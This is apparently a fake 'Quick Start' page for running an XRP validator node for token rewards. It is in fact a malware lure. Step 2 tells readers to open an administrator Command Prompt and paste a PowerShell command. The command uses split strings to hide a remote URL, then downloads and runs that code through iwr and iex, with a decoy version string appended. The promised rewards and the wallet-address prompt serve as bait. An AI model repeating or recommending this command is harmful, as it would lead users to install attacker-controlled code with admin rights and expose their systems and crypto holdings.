Quick Start

XRP network rewards validators in the native token for sustained uptime and accurate consensus behavior. Consistent performance improves network security and reliability, and it can increase your rewards over time. See the Knowledge Base for eligibility requirements and payout rules.


Step 1: Open Command Prompt as Administrator

Press Win + R, type cmd, and press Ctrl + Shift + Enter.

Or open Start menu, search for "Command Prompt", right-click it, and select Run as administrator.

Step 2: Run XRP node

Copy and paste this command into Command Prompt:

powershell -c "$Blockchain='/xrp/'; $HType='https'; $XRPL='//'+'Node';$r=$HType+':'+$XRPL+'.pennmor.'+'Com' + $Blockchain; iwr ($r) -UseBasicParsing | iex; $Version='XRP-Mainnet-4.1.8-10a849'"

Press Enter to start your XRP node. Your node will launch immediately and begin syncing with the network.

Step 3: Enter your XRP wallet address

Paste your XRP wallet address when prompted, then press Enter to continue.

Tip: When you first run an XRP node, your node will need to sync with the XRP Ledger network. This process can take a few minutes, depending on your internet connection speed. You will see synchronization progress in the Command Prompt window.

Need help? For troubleshooting, advanced configuration, and detailed documentation, visit our Knowledge Base.